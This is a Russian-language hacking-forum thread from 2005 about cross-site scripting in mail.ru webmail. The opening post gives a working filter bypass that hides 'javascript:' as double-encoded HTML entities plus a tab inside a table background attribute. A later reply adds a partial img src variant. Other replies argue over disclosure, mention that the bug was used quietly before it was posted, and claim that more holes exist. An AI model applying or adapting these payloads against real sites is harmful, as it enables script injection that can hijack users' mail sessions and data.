xss mail.ru

Discussion in 'Уязвимости Mail-сервисов' started by Майор, 19 Aug 2005.

  1. Майор

    Майор Active Member

    Joined:
    24 Oct 2004
    Messages:
    558
    Likes Received:
    112
    Reputations:
    146
    Проверяв систему, я удивлся тому что фильтр раскодирует ASC II и Hex до потери пульса =), т е до того пока в значении атрибута будет встечаться комбинация
    Code:
    &#
    
    что нам и интересно, ведь если написать
    Code:
    &#38#97
    
    фильтр преобразует это в букву - a
    кусок слова 'javascr' будет выглядить так :
    Code:
    &#38#106&#38#97&#38#118&#38#97&#38#115&#38#99&#38#114
    
    и фильтр не воспримает этот кусок как слово ключевое слово javascript

    а XSS бдет выглядеть как то так :
    фильтр её пропускает, потому что кусок слова закодирован а конец его - нет
    Code:
    <table background="&#38#106&#38#97&#38#118&#38#97&#38#115&#38#99&#38#114		ipt:alert('Hi from mayor')">
    </table>
    
    // внутри табуляция
    
     
    2 people like this.
  2. PinkPanther

    PinkPanther [ розовый мафиозо ]

    Joined:
    16 Mar 2005
    Messages:
    280
    Likes Received:
    75
    Reputations:
    85
    Майор, респект за интересную разработку!!! Но, имхо, не туда запостил!
     
  3. Xattab

    Xattab Elder - Старейшина

    Joined:
    30 May 2005
    Messages:
    37
    Likes Received:
    2
    Reputations:
    2
    [~цензура~] Майор...то что доктор прописал


    прим ну не на столько я молод =)
     
    #3 Xattab, 19 Aug 2005
    Last edited by a moderator: 19 Aug 2005
  4. qBiN

    qBiN Вот такой вот я :(

    Joined:
    20 Jan 2005
    Messages:
    834
    Likes Received:
    73
    Reputations:
    33
    Респект.
     
  5. Dronga

    Dronga ВАША реклама ТУТ!!

    Joined:
    1 Jul 2005
    Messages:
    575
    Likes Received:
    239
    Reputations:
    249
    Майор, я тебе уже всё сказал =) Респект в общем. Долго ты меня мучил))
     
  6. Zadoxlik

    Zadoxlik рояль с сыром

    Joined:
    28 Feb 2005
    Messages:
    758
    Likes Received:
    216
    Reputations:
    257
    Майор, молодец, но пожалуй соглашусь с PinkPanther.
     
  7. NEsTor

    NEsTor Banned

    Joined:
    23 Apr 2005
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Имхо о этой баге уже все знали...

    Те кто знал, юзал её молча терь ты взял и её разглосил!.... :mad:

    Следущий раз думай прежде чем как такие баги выкладывать пожалуйста и другим не гадить.
     
  8. PinkPanther

    PinkPanther [ розовый мафиозо ]

    Joined:
    16 Mar 2005
    Messages:
    280
    Likes Received:
    75
    Reputations:
    85
    NEsTor Я понимаю твоё состояние, но тем немение.....оставь всю свою обиду и агрессию при себе.
     
    #8 PinkPanther, 20 Aug 2005
    Last edited: 20 Aug 2005
  9. Майор

    Майор Active Member

    Joined:
    24 Oct 2004
    Messages:
    558
    Likes Received:
    112
    Reputations:
    146
    твоё имхо остаётся при тебе, я данный вид обхода увидил только сегодня
    и не указывай что мне делать :)
     
  10. NEsTor

    NEsTor Banned

    Joined:
    23 Apr 2005
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Я тебе не указываю, просто подумай в следущий раз о других когда будешь что то такое ценное выкладывать.
     
  11. NIGHT_WOLF

    NIGHT_WOLF Member

    Joined:
    17 Aug 2005
    Messages:
    192
    Likes Received:
    17
    Reputations:
    2
    Найденным нужно делиться. А то это не дело в тихомолку чтобы никто не увидел. Поэтому спасибо что поделился.
     
  12. NEsTor

    NEsTor Banned

    Joined:
    23 Apr 2005
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Ладно не важно, просто Майёр подумай вследущий раз.

    всё.
     
  13. Майор

    Майор Active Member

    Joined:
    24 Oct 2004
    Messages:
    558
    Likes Received:
    112
    Reputations:
    146
    вот не надо мне делать замечания, на mail.ru ещё не 1 xss и если у когото не хватате смекалки .... это не мои проблемы :)
     
  14. SladerNon

    SladerNon Адам

    Joined:
    6 Mar 2005
    Messages:
    1,636
    Likes Received:
    938
    Reputations:
    355
    Майор - молодец!!!

    Пинк, и Задохликс =). Ну не всё же ценное прятать по карманам =).
    Дайте народу свежей водицы попить! =)
     
  15. PinkPanther

    PinkPanther [ розовый мафиозо ]

    Joined:
    16 Mar 2005
    Messages:
    280
    Likes Received:
    75
    Reputations:
    85
    Я сам за то чтоб вся информация была бесплатной и общедоступной!!! Это первоначальный манифест хакеров и так должно быть, но тут проблема в том, что уже к понедельнику все будет залатано, ибо сук маил.рушных тут дофига......хотя Майор правду сказал, это ещё не все....)))
     
  16. VARVAR

    VARVAR New Member

    Joined:
    3 Jun 2005
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    А здесь вообще все просто:

    <img src="java
    script: дальше знаете ...

    Кто мыслит, тот поймет ! И спасибо Майору !
     
    #16 VARVAR, 21 Aug 2005
    Last edited: 21 Aug 2005
  17. NEsTor

    NEsTor Banned

    Joined:
    23 Apr 2005
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Ладно, вот щас опять закроют багу, и всё!

    Нафиг выкладывать был особенно когда знаем, что закроют.
     
  18. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    И хорошо. Сделаем mail.ru безопасным.
    Не все нужно ломать, нужно и оставить то, на чем сидеть.
     
  19. SladerNon

    SladerNon Адам

    Joined:
    6 Mar 2005
    Messages:
    1,636
    Likes Received:
    938
    Reputations:
    355
  20. Майор

    Майор Active Member

    Joined:
    24 Oct 2004
    Messages:
    558
    Likes Received:
    112
    Reputations:
    146
    не , у него руки кривые.... посмотри на его пост, это как это тег table в img превратился ?